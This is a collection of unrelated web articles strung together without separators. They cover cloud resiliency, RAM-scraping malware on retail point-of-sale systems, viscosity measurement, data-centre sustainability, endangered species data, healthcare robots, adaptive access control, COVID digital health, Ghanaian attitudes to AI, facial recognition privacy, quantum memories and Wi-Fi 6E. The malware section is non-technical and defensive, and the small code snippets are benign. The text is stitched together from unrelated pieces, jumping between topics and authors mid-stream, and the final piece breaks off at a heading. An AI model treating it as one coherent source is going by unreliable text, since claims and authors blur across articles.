Leveraging multi-region solutions is an important strategy for building enterprise-scale resiliency. One way to accomplish multi-region solutions is to leverage multiple cloud providers. AWS, Microsoft Azure, and Google Cloud all have solutions for multi-cloud and hybrid service options. IT leaders who are seeking greater resiliency for their organizations would be wise to consider new models and opportunities from these public cloud providers.
Designing for failure means striking the right balance that gives the organization control while also preparing for what very well could go wrong.
The cloud is designed to fail
Although our applications aren’t usually designed to fail, the cloud is. Ensuring high levels of cloud uptime requires safeguards, such as the ability to route traffic to different geographic regions. When failure does occur, the last thing a CIO or an organization wants is for failure to unfold without a guiding plan.
Retooling failure into a controlled fall returns agency in otherwise troubled situations. This principle is similar to one found in Aikido, a Japanese self-defense martial art. Aikido teaches practitioners how to fall properly—because everyone falls (and sometimes you’re pushed). By falling in the right way, you can roll back onto your feet and minimize injury in the process.
Applications should fall in a similar way. Careful planning, an intimate knowledge of cloud architecture, and design that understands and quickly responds to failure can bring organizations back to their feet again quickly so they can meet uptime requirements and keep customers happy.
How organizations recover from an incident makes a difference in minimizing damage, and these recovery plans can become even more effective and efficient when we approach failure as inevitable and plan for it accordingly. While this requires a massive paradigm shift across the industry, CIOs and IT leaders need to spend the time and resources today to proactively design their systems to fail, allowing organizations to have more effective failure plans in place and achieve the high uptime that keeps us all moving forward.
Learn more about the importance of designing to fail from Lucidchart.
Do you own or operate a retail business? You aren’t alone. Statistics show that there are now over 1 million retail businesses operating in the United States. Assuming your retail business has a brick-and-mortar store, you may want to take precautions to protect it from random access memory (RAM)-scraping malware. Retail businesses are often targeted with RAM-scraping malware because they use point-of-sale (POS) systems.
What Is RAM-Scraping Malware?
Also known simply as memory-scraping malware, RAM-scraping malware is malicious software that scans and steals data from a device’s RAM. All computers have RAM. Computers use RAM to temporarily store data, primarily data associated with open programs or processes. But RAM isn’t limited to computers. Other types of devices have RAM as well, including retail POS systems. Hackers will often use RAM-scraping malware to target retail POS systems.
Retail POS Systems and RAM-Scraping Malware
Retail POS systems are responsible for processing customers’ payments. In the past, they consisted of mechanically operated cash registers. Today, most retail POS systems are computer based. They may have a built-in cash register, but modern-day computer-based POS systems are able to scan credit cards so that customers aren’t forced to pay with cash.
If your retail business uses a computer-based POS system, it may become a target for RAM-scraping malware. When a customer scans his or her card, the information will be stored in the POS system’s RAM. RAM-scraping malware may be used to capture and steal this data.
POS Malware vs RAM-Scraping Malware
The term “POS malware” is used to describe RAM-scraping malware that specifically targets the RAM of POS systems. It’s become more common in recent years. Hackers will deploy POS malware on retail businesses’ devices and IT infrastructures, which they’ll use to steal customers’ data.
The term “RAM-scraping” malware refers to all forms of malicious software that target the RAM of a device. It may target the RAM of a POS system, or it may target the RAM of a desktop computer or laptop. POS malware is simply a type of RAM-scraping malware.
Different forms of malware target different parts of a device. While most forms of malware target storage drives, RAM-scraping malware targets the RAM. It’s a concern for retail businesses because of its ability to capture and steal customers’ data. If your retail business uses a POS system, you’ll need to secure it so that it’s not susceptible to RAM-scraping malware.
Measurement and Interpretation of Viscosity for the Process Industries
Viscosity is an important quality of many consumer and industrial products. For example, customers judge many personal products, such as shower gel and shampoo, by their “feel” and assess the quality of foods, such as ketchup and mayonnaise, by their texture. Similarly, the performance of paints, in their end use, is determined by their viscosities since this affects how easy they are to apply and how they move after application. The likelihood of a paint dripping down a vertical wall will be determined by its viscosity.
A fluid is considered Newtonian if its viscosity is independent of the rate at which it is being sheared (e.g., mixed or pumped). Most viscous fluids are non-Newtonian, though. That means to some degree, their viscosity hinges on the rate at which they are being sheared. The majority of these are shear-thinning, meaning their viscosity decreases as the rate of mixing or pumping increases.
Viscosity can be measured by several devices, most commonly a Couette, cone-and-plate or capillary viscometer. Their basic operating principle is to measure the force required to move the fluid at a certain velocity. The force can be converted to the shear stress being exerted on the fluid, and the velocity can be related to the shear rate. The dynamic viscosity of the fluid is then the ratio of shear stress to shear rate.
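As a quick worked illustration of that ratio (the numbers here are chosen to be consistent with the corn syrup value quoted below, not read from the figure):

    shear_stress = 207.0   # Pa, force per area reported by the viscometer
    shear_rate = 10.0      # 1/s, set by how fast the fluid is being sheared
    viscosity = shear_stress / shear_rate
    print(viscosity)       # 20.7 Pa s, i.e. 20700 cP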
The diamond symbols in Figure 1 measure the shear stress versus shear rate, known as a rheogram, for corn syrup measured using a Couette viscometer. The first thing to notice: the relationship between shear stress and shear rate is linear, which means this is a Newtonian fluid.
The circles are the plot of viscosity versus shear rate, and because this is a Newtonian fluid, it is constant. This Corn Syrup has a viscosity of 20.7 Pascal-seconds (Pa s) or 20700 centiPoise (cP). For comparison, water (another Newtonian fluid) has a viscosity of 1 cP.
Figure 2 shows a rheogram for mayonnaise. In this case, the shear stress data, the diamonds, curve downwards with increasing shear rate. This indicates the fluid is shear thinning. The viscosity, shown by the circles, decreases with increasing shear rate. At a shear rate of 1 reciprocal second (s-1), the viscosity is 120 Pa s, while at 10 s-1, it is 18 Pa s. So, the questions for engineers: what is the shear rate generated by my equipment, and what is the viscosity that should be used for design calculations?
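One common way to answer that question (a standard rheology approach, though not one this article applies explicitly) is to fit a power-law model, viscosity = K * (shear rate)^(n-1), to the measured points and then evaluate it at the shear rate the equipment actually generates. Using the two mayonnaise values quoted above, and an illustrative equipment shear rate:

    import math

    # Measured points from the rheogram: (shear rate in 1/s, viscosity in Pa s)
    (r1, v1), (r2, v2) = (1.0, 120.0), (10.0, 18.0)

    # Fit viscosity = K * rate**(n - 1) through the two points
    n = 1 + math.log(v2 / v1) / math.log(r2 / r1)   # flow behaviour index, ~0.18
    K = v1 / r1 ** (n - 1)                          # consistency index, 120 Pa s^n

    equipment_shear_rate = 50.0                      # 1/s, illustrative value only
    design_viscosity = K * equipment_shear_rate ** (n - 1)
    print(round(n, 2), round(design_viscosity, 1))   # 0.18 and ~4.8 Pa s

The design viscosity at 50 s-1 is far below the 120 Pa s measured at 1 s-1, which is exactly why the equipment’s operating shear rate matters.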
Another potential property of viscous fluids is time dependency. This is demonstrated in Figure 3, which shows the rheogram for tomato ketchup. It is well known that ketchup will not flow out of its bottle until it has been shaken. This is because the fluid builds structure with time in the bottle, and this structure must be broken before it will flow. The shear stress plot shows two curves; the red diamonds show the Couette bob speed increasing, and the blue show when it is decreasing. As the bob accelerates, the structure that has built in the ketchup is broken so that, when it decelerates, the bob is moving in a simple shear-thinning fluid. In this case, engineers should consider whether their equipment will ever stop operating long enough for structure to build, which would require the equipment to restart in a more viscous fluid. If this is possible, how should the equipment be sized accordingly?
There is a more extreme form of non-Newtonian behavior exhibited by fluids with a yield stress. In these cases, the mixer or pump must generate a minimum force before the fluid will move. This is analogous to the yield stress in a solid material. If a steel bar is stretched or bent, it will return to its original position unless the shear stress exerted exceeds its yield stress. In that case, the bar will permanently deform.
Figure 4 shows the rheogram for a polymer solution. At shear rates below 1 s-1, the shear stress has a constant value of ~300 Pa as the shear rate changes; this is the fluid’s yield stress.
An agitator must generate a shear stress that exceeds the fluid yield stress or it will not move. In a stirred vessel this results in stagnation at the walls and fluid surface, which can lead to poor incorporation of materials added to the vessel, poor heat transfer from the vessel walls into the fluid and incomplete mixing of a batch.
One final point to note is that these measurements should be made over the range of shear rates that are expected in the equipment being designed. Typical shear rates in stirred tanks are lower than those found in pipe flow, and these are lower than those found in a paint spray nozzle. It is quite common for the relationship between shear stress and shear rate to change over a wide range of shear rates, and it can be dangerous to extrapolate beyond the range over which the measurements were made.
Renewable energy initiatives have been on the news agenda the last couple of weeks. According to Bloomberg, a large proportion of the Fortune 500 has set clean energy goals in response to the savings generated by renewable power. As companies amass huge amounts of data, a significant part of their strategy for reaching their ambitious goals will involve data centers, no matter if a business owns, builds or uses them in the Cloud.
Apple is leading the way in this area. The company recently released its Annual Environmental Responsibility Report which provides a detailed outline of the steps it is taking to ensure its data centers are environmentally friendly.
Of course, in order to assess progress and success these companies will also need to track and report against sustainability and energy efficiency metrics too.
Reliable data is critical
But metrics are only as good as the accuracy of the data feeding into them. If companies put sustainability at the core of their business strategies, the metrics they set will be heavily scrutinized.
So, what happens if raw data from data centers is not properly cleaned and validated, leading to weeks and even months of incorrect and misleading information?
The result will be an embarrassing anomaly in the resulting operational report and a lot of awkward explaining to managers, stakeholders and potentially customers and shareholders.
Accurate, reliable data is central to a serious sustainability initiative; collecting raw data and presenting it is simply not enough. After all, important decisions about a facility’s environmental profile are made on the basis of that data, so it needs to be spot-on.
The key to meeting environmental goals with confidence is to collect, clean, validate and then analyze the data relating to energy efficiency, carbon emissions and water consumption, in order for the business to have confidence in it. In this way, data center managers can quickly understand what areas need adjustments and remove the risk of making poorly informed decisions due to bad data when planning changes or improvements for each facility.
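What "collect, clean, validate and then analyze" can mean in practice is sketched below: a hypothetical pass over raw meter readings that rejects obviously bad samples before any efficiency metric is computed from them. The field names and the sanity rule are illustrative assumptions, not a description of any particular product.

    def validate_readings(readings):
        # Keep only samples that can plausibly feed an efficiency metric;
        # flag the rest for investigation instead of silently reporting them.
        clean, suspect = [], []
        for r in readings:
            ok = (
                r.get("facility_kwh") is not None
                and r.get("it_kwh") is not None
                and r["facility_kwh"] >= r["it_kwh"] >= 0   # facility load includes IT load
            )
            (clean if ok else suspect).append(r)
        return clean, suspect

    clean, suspect = validate_readings([
        {"facility_kwh": 1200, "it_kwh": 800},
        {"facility_kwh": 90, "it_kwh": 140},   # impossible: IT load exceeds facility load
    ])
    print(len(clean), len(suspect))            # 1 1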
Another crucial point for organizations with clean energy objectives is in the planning of data centers. A report containing incorrect data could lead to a design that struggles to meet the business requirements, or to large budgets being spent without a verifiable return on investment. Analysis of available data can help to ascertain the most economic, sustainable and cost effective design options and locations before a spade even hits the ground.
It is reassuring to see so many renewable and environmentally-minded projects being initiated by world leading organizations. Let’s hope they pay as much attention to clean data as they do to clean energy.
Zahl Limbuwala is founder and executive director of Romonet, a company that develops software for data center lifecycle analytics
Endangered species data consists of information about the prevalence of animal and plant species in a region and focuses on the existential threats they face.
Information about the numbers and range of threatened and endangered species comes from scientific observation. The information is then verified officially by national or international bodies, such as the IUCN (International Union for the Conservation of Nature).
Not all scientific observation needs to come from scientists, anyone can take conservation courses to learn how to assess species’ vulnerability. See, for example, the IUCN Red List training courses.
This data can appear in interactive maps or in columns of information. However, standard data attributes, aside from species, include ecoregion, threats, and status. The IUCN Red List offers nine statuses: Extinct, Extinct in the Wild, Critically Endangered, Endangered, Vulnerable, Near Threatened, Least Concern, Data Deficient, and Not Evaluated.
Other organizations may have their own statuses list but the Red List is the largest and most used resource around the world.
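As an illustration of how those attributes and statuses might be represented in a dataset (the field layout is a hypothetical sketch, not the IUCN’s actual schema, and the example record is included only for illustration):

    from dataclasses import dataclass

    RED_LIST_STATUSES = [
        "Extinct", "Extinct in the Wild", "Critically Endangered", "Endangered",
        "Vulnerable", "Near Threatened", "Least Concern", "Data Deficient", "Not Evaluated",
    ]

    @dataclass
    class SpeciesRecord:
        species: str
        ecoregion: str
        threats: list
        status: str

        def __post_init__(self):
            # Reject statuses that are not part of the standard Red List vocabulary
            if self.status not in RED_LIST_STATUSES:
                raise ValueError(f"unknown status: {self.status}")

    record = SpeciesRecord("Amur leopard", "Temperate broadleaf forest",
                           ["poaching", "habitat loss"], "Critically Endangered")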
Researchers use this data to study endangered animal and plant species as well as the environments they live in. Conservationists also use this data to work to enhance the biodiversity of a region or of the planet in general.
With less than 5% of known species on the planet measured for endangered status, one of the greatest challenges of this category is the lack of comprehensiveness. In addition, plants and wild animals don’t volunteer for study; researchers and conservationists must track them down to record their prevalence. In short, the recording of this data is one of the greatest challenges of this data category and the only solution is further study and observation.
Changing threats to habitats and species and changes in taxonomic classification are other challenges experienced.
Unfortunately, big data also risks harming endangered and vulnerable wildlife.
Cybersecurity news often focuses on how hackers access personal information, bank accounts, social media, and government data. But what if “cyberpoachers” started targeting information on the locations of endangered species through their animal tracking data?
AER – Earth provides research & studies on everything interconnected with our planet
Arabesque Portfolio Screening Tool provides licensed screening services that generate insights and reports on an entity’s portfolio performance against S-Ray scores. It features benchmark comparison; weekly, monthly, or quarterly reporting; and automated portfolio updates.
Sustain Planet Earth Committed™ is based on the United Nations SDGs and is aimed at small and mid-sized enterprises.
Modern tech has revolutionized the healthcare industry. When patients can’t be treated at the hospital, new technologies enable patients to receive quality care from the comfort of their homes.
SwissCognitive Guest Blogger: Sam Bowman “The Future of Healthcare in the Home May Come With Robots”
But while the benefits of telehealth were once limited to virtual checkups and prescription deliveries, modern healthtech is advanced enough to completely replace several services offered by primary care providers, hospitals, and specialists.
Thanks to modern robotics — and the artificial intelligence that supports its functionality — care is more convenient, accurate, and affordable than ever. Let’s explore some of the new technology that brings doctors to patients’ homes, and how providers and patients alike can benefit from robots in the future of healthcare.
Boosting Access to Care With Healthtech
The need for increased healthcare accessibility is always a pressing need. Modern healthcare technology has already made it possible for patients to get access to care that’s not locally available, but with the rise of more robots and AI, remote medical support is more widely applicable than ever before.
For example, nursing robots can now perform advanced tasks like drawing blood with greater accuracy by using scans. In addition, there’s no need for rural patients to travel to specialists just for a brief checkup. Eventually, advancements in the precision of surgical robots may even allow emergency care to occur in the home with supervision.
Robotic exoskeletons are a particularly exciting development right now. When healthcare providers are far away, this technology — which supports mobility — allows patients to get around safely in their homes, whether they want to go to the restroom or exercise. This improves independence (and therefore, quality of life) for many long-term patients. For physical therapy patients, exoskeletons could provide continued treatment without regular visits, which can be demanding for those in rural areas.
Offering Mental Health Support Around the Clock
While the robots in healthcare largely support physical health, many innovators are developing new tools to support mental wellness, too. For example, PARO — a therapeutic robot that looks and sounds like a baby harp seal — can reduce patient stress and increase socialization. When implemented in home-based care or assisted living facilities, robots like PARO reduce the challenges and risks associated with real-life therapy animals, all while providing comfort to patients in times of need.
Robots and AI technologies can also detect physiological signs of mental health crises, like changes in heart rate for people who are about to have a panic attack or changes in tone of voice for people with worsening depression. While they won’t replace therapists any time soon, they can be key tools for healthcare practices and home-based nurses that can’t otherwise monitor patients 24/7.
Using Robots To Cut Costs and Boost Efficiency
Robots can be incredibly cost-effective for healthcare providers. When used for healthcare in the home, they eliminate the need for costly nursing labor in menial tasks (like cleaning medical supplies). Medical professionals can offer more attentive care or treat more patients in less time.
AI technology, whether integrated into a robot or on a computer, can also analyze large amounts of patient data faster than any human. This empowers both telehealth and home-based care providers to quickly provide medical answers — like skin care diagnoses and medical condition updates — as well as cost-effective treatment plans. As a result, medical practices may be able to reduce the burden of healthcare costs for patients. Treatment costs alone can decrease by 50% with the support of AI.
Digitization Comes With Risks — But They Can Be Mitigated
The implementation of robotics, AI, and other healthcare technologies isn’t without risk. Digital tools that are connected to the internet can be exposed to cybercrime. For example, while the movement to the cloud has increased transparency by making medical records more accessible, it also increases the risk of sensitive information being stolen. If home WiFi isn’t secure, it can also lead to in-home nursing robots being hacked and used in nefarious ways.
Providers can help patients decrease the risks of modern medical technologies — and artificial intelligence can fittingly be a tool to fight these risks. AI can automatically detect cyberattacks and contribute to faster responses to potential breaches.
Healthcare technologies, when implemented safely, can offer significantly more rewards than risks for home care providers and patients.
The Future of Healthcare Is Here
Healthcare technologies are more advanced than ever, and the rising introduction of robots in the medical field is something to celebrate. Robots and AI are making it possible for providers to offer accurate physical care — like symptom monitoring and blood draws — and supportive mental health care alike from afar. New solutions alleviate the costs and travel time needed for quality healthcare to occur for both patients and providers.
While digitized healthcare always comes with some risks — especially that of cybercrime — its benefits far outweigh the potential downsides, which can be mitigated with the right steps.
About the Author:
Sam Bowman is a published freelance writer from the West Coast who specializes in healthcare tech and artificial intelligence content. His experience in patient care directly translates into his work and his passion for industry technologies influences the content he creates. Sam has worked for years – directly in, and writing about – healthcare technology and the many benefits it offers to patients and doctors alike. He loves to watch as medical tech and business software grow and develop, ushering in a modern age of industry.
Adaptive access control is the process of using IT policies that allow administrators to control user access to applications, files, and network features based on multiple real-time factors. It is more flexible and secure than a legacy "moat" approach.
Explore additional adaptive access control topics:
Companies dealing with unprecedented IT expansion and evolution should ask themselves a few questions about their security and access control policies.
Are they using strategies that will truly protect against the types of threats they'll face today? Have they adequately prepared for the rise of remote work and bring your own (BYO) device policies? Will their chosen security approaches allow employees to work efficiently rather than interrupting workflows?
To answer "yes" to those questions, IT departments will have to go beyond legacy methods that were designed with in-office employees and corporate-owned hardware in mind. Those traditional security approaches were rigid and focused on binary options—some actions were allowed and others were blocked, with very little nuance. A better approach was needed.
Adaptive access control allows IT departments to set granular security policies that affect every application, API, software tool, and network resource their employees use. When implemented effectively, such an approach combines strong, flexible cybersecurity with a simple end user experience, keeping businesses safe and efficient as conditions change around them.
While technology evolution has never been static, the past few years have been especially eventful. Many companies that previously experimented with remote or hybrid workforce models suddenly found themselves using these strategies 100% of the time during COVID-19. Cloud service adoption rates spiked and BYOD technology became essential to continued operations.
As the pace of digital transformation accelerates, IT teams need to make sure these changes don't outpace their ability to keep networks and user accounts secure. Cybercriminals constantly look for vulnerabilities in corporate systems, and periods of rapid change are likely times for them to strike.
This is where concepts such as adaptive access control can truly prove their worth, providing organizations with flexible ways to protect systems. Traditional approaches to security—building proverbial moats around important network resources using firewalls and VPNs—simply don't work when employees are relying on personal devices and networks to access software remotely.
IT admins need access control policies that acknowledge the numerous ways users log in and use company resources. Adaptive access control technology uses modern analytics, machine learning, and automation to grant an appropriate level of access for each user session.
An adaptive access control policy should incorporate several modern security approaches, creating the ideal combination of user flexibility and wide-ranging security. A solution that is too rigid tends to fail on both counts, restricting users' actions while still failing to keep them safe from novel threat types such as zero-day attacks. Going beyond a limited security solution means embracing approaches such as zero trust network access (ZTNA), multi-factor authentication (MFA), and contextual, risk-based policies.
Adaptive access control can apply to a variety of applications today. Whether an organization hosts applications in its own datacenter or uses cloud apps with a SaaS model, IT departments can introduce this advanced and context-driven form of access control.
It's up to the IT department to decide what level of access is appropriate. When a user's risk score increases, potentially due to their location or the kind of device they're using, the features available to them may be affected. Rather than selecting whether a user has access to an app or not, the IT department can switch off capabilities such as the ability to take a screenshot or to use a device's USB drive. These precautions exist to prevent the potential loss of sensitive data while not interrupting the user experience. The result is higher productivity for legitimate users and defenses against hackers.
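The paragraph above describes capability-level decisions rather than a simple allow/deny. A hypothetical sketch of that logic is shown below; the risk thresholds and feature names are invented for illustration and are not any vendor’s actual policy model.

    def session_capabilities(risk_score, managed_device):
        # Grant access in every case, but trim risky capabilities instead of
        # blocking the user outright.
        caps = {"open_app": True, "screenshot": True, "usb_drive": True}
        if risk_score > 30 or not managed_device:
            caps["usb_drive"] = False          # guard against data exfiltration
        if risk_score > 60:
            caps["screenshot"] = False         # sensitive data stays in the app
        if risk_score > 90:
            caps["open_app"] = False           # only the highest risk blocks access
        return caps

    print(session_capabilities(risk_score=45, managed_device=False))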
See how Citrix helps you go beyond SSO and multi-factor authentication (MFA) to build an adaptive access control strategy.
The problems with legacy access control methods come down to one central idea: they were designed for a version of IT that no longer exists at many organizations. Expanding beyond the perimeter of the traditional enterprise datacenter means widening a business's potential attack surface, and static access control policies are not flexible enough to make this transition.
For many years, the concept of corporate application security was relatively simple. Using these methods today may leave organizations vulnerable, limit their efficiency, or do both. These static access control policies are based on whitelisting. Certain URLs and user profiles receive access to a list of specific applications.
When users need remote access, they take advantage of solutions such as a virtual private network (VPN). This prevents them from employing their own BYOD devices and network connections, while also granting too much trust to users who have the right credentials.
Once an account or device has been whitelisted, the system may not detect malicious activity from that device. In an era of indirect attack types such as spear phishing, this represents a dangerous security loophole. Add this risk profile to the inconvenience of disallowing BYO devices, and it's clear that traditional security has become outdated.
The modern networking environments companies use today have evolved beyond the point where a perimeter-based approach featuring a static access control model can protect them. Not only do remote and hybrid workforces include employees working from a wide variety of devices from their own locations, but the applications they access have also become more complex as well.
IT departments today are tasked with protecting apps hosted in private clouds, public clouds, and on-premises datacenters. With an adaptive access control method employing ZTNA principles, it's possible to oversee all these systems from a single, cloud-based security suite.
The monitoring and access control technologies deployed across these sprawling networks allow IT departments to carefully guard against advanced threats without the painstaking process of setting up dozens of security tools. The managed security stack demands less manual input from IT professionals, while still delivering a level of protection that would be impossible with more rigid tools.
When selecting a security approach, the first consideration is keeping apps, users, and information safe from threats. That isn't the only factor IT departments should use to choose how they protect their technology, however. They should also consider the impact on the user experience.
Productivity depends on users being able to access all the digital tools and resources associated with their roles. Adaptive access control allows IT departments to set access profiles that will give employees these capabilities automatically, ensuring they don't have to keep interrupting workflows to verify their identities or log into extra applications. With access management and permissions handled automatically, these steps go into the background.
In cases where there is an elevated security risk level, or when an employee is trying to use a feature beyond their usual needs, the IT department can manually verify the user’s identity. At other times, the adaptive authentication and access control systems are unobtrusive and essentially invisible.
The other major benefit to user experience lies in the adaptive access control systems’ ability to enable employees to log in from a wide variety of locations and BYOD endpoints. While more restrictive static access control policies may have excluded such devices altogether, preventing remote employees from getting work done in their preferred ways, modern access control frees them up.
The ideal access control provider for a modern company will have a few specific features, setting itself apart from the generations of legacy technology that came before. This platform will be cloud-delivered, context-aware, and unobtrusive for the end user.
Businesses get such a system when they select Citrix Secure Private Access as their ZTNA security and access control solution. Having this technology in place is an essential step in expanding into a new era of remote work and cloud-enabled expansion.
Published on Monday, Jun 15 2020 by Mounir Jamil
As the current pandemic continues to spread, we notice that digital health technologies are on the rise. With that in mind, we’ve taken the liberty of curating the top 5 influential digital health technologies being utilized right now, all over the world.
1: 3D Printing
Healthcare institutions are facing a shortage of medical equipment. With a lack of personal protective equipment (PPE) and even failing respirators, medical personnel and patients are being put at great risk. To meet the new shift in demand, digital health technologies such as 3D printing are being used. People are 3D-printing all types of equipment, from face shields all the way to swabs and even ventilator parts.
2: Telemedicine
Telemedicine is also one of the digital health technologies being used in the fight against COVID-19. Although telemedicine is an already established field, it has seen a massive boom in usage during the pandemic. Companies like Amwell have reported usage of their telemedicine apps skyrocketing by a significant 158% in the U.S. since January. Appointments through PlushCare have also increased by 70%. Before the pandemic, by comparison, only 1 in 10 US patients reported using telemedicine services. The pandemic has given digital health technologies like telemedicine a much-needed boost. It is very probable we will see an increase in adoption and development as we move forward.
3: Smartphone Tracking
Governments around the world have resorted to digital health technologies that track smartphone users, identify their location, and alert those that might be in close proximity to someone who is infected with the virus. At least 10 countries are employing such surveillance methods. Singapore’s app uses Bluetooth and wireless signals for tracing a user’s proximity, while Moscow launched a QR-based system to track the virus.
4: Artificial Intelligence (AI)
With the current pandemic, the importance of AI in digital health technologies has been made more prominent. The Zhongnan Hospital in China is utilizing an AI-based system for CT lung screening to help doctors prioritize potential COVID-19 cases for further testing. In addition, Barabasi Lab is merging machine learning with network science in the hope of finding potential drug candidates against the virus.
5: Virtual Reality (VR)
Virtual Reality holds promising uses in the fight against COVID-19. A study conducted by Harvard Business Review revealed that surgeons who were trained with VR showed a 230% improvement in their overall surgical performance. VR can also be used to develop empathy amongst medical students by placing them in different simulations that help them understand patients’ needs.
AI is leveraged in many industries, and healthcare is prime amongst them. The article examines the perceptions and viewpoints Ghanaian healthcare workers have about AI health applications
SwissCognitive Guest Blogger: Randy Adjepong, AI Engineer, Editor
Artificial Intelligence is great, it’s fashionable, more importantly, it scales! The knowledge of its full potential hasn’t been understood yet, but we can see the great innovations through voice recognition, facial recognition, and image classification.
Artificial intelligence, a construct that dominates the fourth industrial revolution, still eludes most people. It is either too abstract and complex to understand or, coupled with Hollywood’s bombast, the subject of a manufactured fear.
In rural Africa, I believe artificial intelligence – by no means an elixir at this stage – can still offer a great solution to the big problems we face, especially in the healthcare field.
In the quest to find out the perceptions and attitudes healthcare professionals have about artificial intelligence, I disseminated a survey through a network of medical practitioner friends to ascertain their honest opinions and feelings about the use of AI.
My survey took a social research approach and used mixed methods, combining a questionnaire with interviews to further appreciate the information in the subjects’ own words. Statistical tests were employed to derive meaningful insights from the data using R.
Out of a possible sample size of 250, a pool of 77 participants fully completed the questionnaire and 10 agreed to a follow-up interview.
The GAAIS questionnaire, as designed by Schepman and Rodway, contained items which examine the subjects’ general attitudes toward artificial intelligence. As a standardised scale, the score could suggest whether a participant expressed a more positive or a more negative attitude.
What really is AI?
Overall, 80% of participants expressed a positive attitude towards AI, which suggests that healthcare professionals in Ghana should be in favour of using big data in electronic health records, deploying image classification in medical diagnosis, and using robots for laparoscopic surgery.
Regardless of their positive outlook on AI, the follow-up interviews showed they had little knowledge of its applications in the healthcare field. Although this did not surprise me, the knowledge they showed about other applications, such as voice recognition with Siri and haptic feedback in goal-line technology, was still impressive.
What this suggests is that general acceptance and appreciation of artificial intelligence was prevalent amongst healthcare professionals, while knowledge of specific healthcare applications was virtually non-existent.
Artificial intelligence is the machines’ ability to mimic human intelligence, thereby making work much easier for humans. Humans are always in search of the most productive and efficient way to complete tasks, and AI provides an elixir for such processes.
Where are we in the AI journey?
If, amid all these technological innovations, Ghana as a whole fails to catch up with its European or American counterparts, we face the challenge of being unable to leverage these technologies.
Quite recently, start-up companies like Zipline have used drones to transport medical equipment to the rural parts of Ghana – an intervention which would previously have cost the government much money and wasted time.
Consequently, there has also been an upsurge of virtual health clinics, which promise patients a much-renewed sense of healthcare service and allow caregivers to deliver a personalised service.
Although virtual healthcare clinics powered by big data and machine learning may not solve all of the average Ghanaian’s healthcare pleas, there exist other alternatives and solutions which could be used to avert the deficit in the doctor-to-patient ratio.
The complexities involved
But assimilating new technologies in any new culture or organisation is not a walk in the park. People are not usually readily accepting of change and a careful assessment of my survey shows the reservations some medical professionals may have about using AI in their line of work.
A junior physician said that “in using AI through virtual healthcare clinics it disrupts provider-patient relationship which is of prime importance in medical care. A patient usually may not know what exactly the problem may be but through body language and speech it could assist me in arriving at diagnosis”
Another junior physician lamented:
“We don’t have the necessary foundation to deal with the large amount of data we produce here in our healthcare facilities. I think it is much better to focus on other aspects of the healthcare system than deploying technologies which will eventually render some people jobless”
What I find interesting about the notion of allocating resources to more important facets of the healthcare system at the expense of AI is that AI as a technology is built for a society like ours; the notion that AI is a fancy technology only adoptable by more advanced and wealthy countries is far from the truth.
Ratio of doctors to 100,000 population in selected low and middle-income African and high income countries (1995–1999). (Source: Liese et al 2003.)
Remote patient monitoring – an intervention made possible through the combination of artificial intelligence and the Internet of Things – can effectively ease the deficit in provider-to-patient ratios, help reduce maternal mortality rates, and make the communication of information much more effective.
I can only deduce that strong opinions of fear and hostility towards AI are widespread across continents, and the need to educate people further on its use cases and domain-specific applications will be important.
Like anywhere else, Africa has its own problems, many of which AI can solve optimally; it is not meant only for the fancy FinTech industry but also for the healthcare, mining, and oil and gas industries.
If you are interested in reviewing the data collected for the short survey, it is available upon request here
About the Author:
Randy Adjepong is an AI researcher/entrepreneur. He enjoys debunking myths about AI in the most deprived parts of the World.
It’s called “This is how we lost control of our faces,” appears in the February 5, 2021 edition of MIT Technology Review, and was written by Karen Hao.
The article outlines a study recently published by Deborah Raji and Genevieve Fried titled About Face: A Survey of Facial Recognition Evaluation, which includes a survey of over 100 face datasets compiled “between 1976 to 2019 of 145 million images of over 17 million subjects….” It reportedly is the largest study of facial recognition technology ever conducted.
Hao posits that the study “shows just how much this enterprise has eroded our privacy. It hasn’t just fueled an increasingly powerful tool of surveillance. The latest generation of deep-learning-based facial recognition has completely disrupted our norms of consent.”
There are way too many fascinating things about Hao’s synopsis of the study and the study itself to summarize in a blog post. Both are worth reading and contemplating in determining facial recognition technology’s impact on our own privacy, as well as how we want different facets of society to respect our privacy if using facial recognition technology. The study analyzes the development and use of facial recognition technology over the past 30 years. It is relevant and insightful into how we can shape parameters around the use of facial recognition over the next 30 years and beyond.
As Raji and Fried say, “Facial recognition technologies pose complex ethical and technical challenges. Neglecting to unpack this complexity-to measure it, analyze it and then articulate it to others-is a disservice to those, including ourselves, who are most impacted by its careless deployment.”
UofChicago Team Demonstrates Atomic Quantum Memories in Silicon Carbide & Creates Entangled State
(UChicago) Scientists at the University of Chicago demonstrated control of atomic quantum memories in silicon carbide, a common material found in electric cars and LED light bulbs. Then, they used this control to create an “entangled state,” representing a connection between the quantum memories and electrons trapped in the semiconductor material.
The study effectively shows how one could encode and write quantum information onto the core of a single atom, unlocking the potential for building qubits that can remain operational—or “coherent”—for extremely long times. The study results hold major implications for quantum computing, according to the authors.
“Just like a desktop computer has different types of memory for various purposes, we envision quantum technologies will have similar needs,” said co-first author Alexandre Bourassa, a graduate student at the Pritzker School of Molecular Engineering at the University of Chicago. “Our trapped electron is like a CPU, where different nuclear spins can effectively be used as a quantum RAM and hard-drive to provide both medium- and long-term storage of quantum information.”
Since the introduction of wireless to networking, the WLAN has been limited by one major factor: the radio spectrum. When Wi-Fi was first introduced, the spectrum was limited to less than 100Mhz in the 2.4GHz range. Throughout the various evolutions of wireless networking, two of the main goals have been to more efficiently use spectrum, and to add spectrum to overcome overlap and throughput constrictions. The new 1200MHz of spectrum provided by the 6GHz channels allows us to rethink how we design channel plans, plus leveraging larger channel widths – previously considered bad practice – allows us to overcome previous constraints.
The Overlap Problem
Wireless networks operate using a spread-spectrum concept; this means the energy from a transmission spans a portion of the spectrum, in our case either 22MHz or 20MHz wide. This is how we come up with the three non-overlapping channels in the 2.4GHz band. With 5GHz support in 802.11a/ac/ax, our usable spectrum increases 5x to 500MHz, allowing for 25 non-overlapping 20MHz channels. Wi-Fi 6E introduces another frequency range for our use: 6GHz, with up to 1200MHz of new spectrum (this varies by geography). If your region supports all 1200MHz of the new spectrum, 59 additional channels are available to client devices! As client devices that are capable of supporting this new spectrum come to market, at a minimum it is important to think about how our wireless designs will change in key high-density areas.
Capacity and Throughput
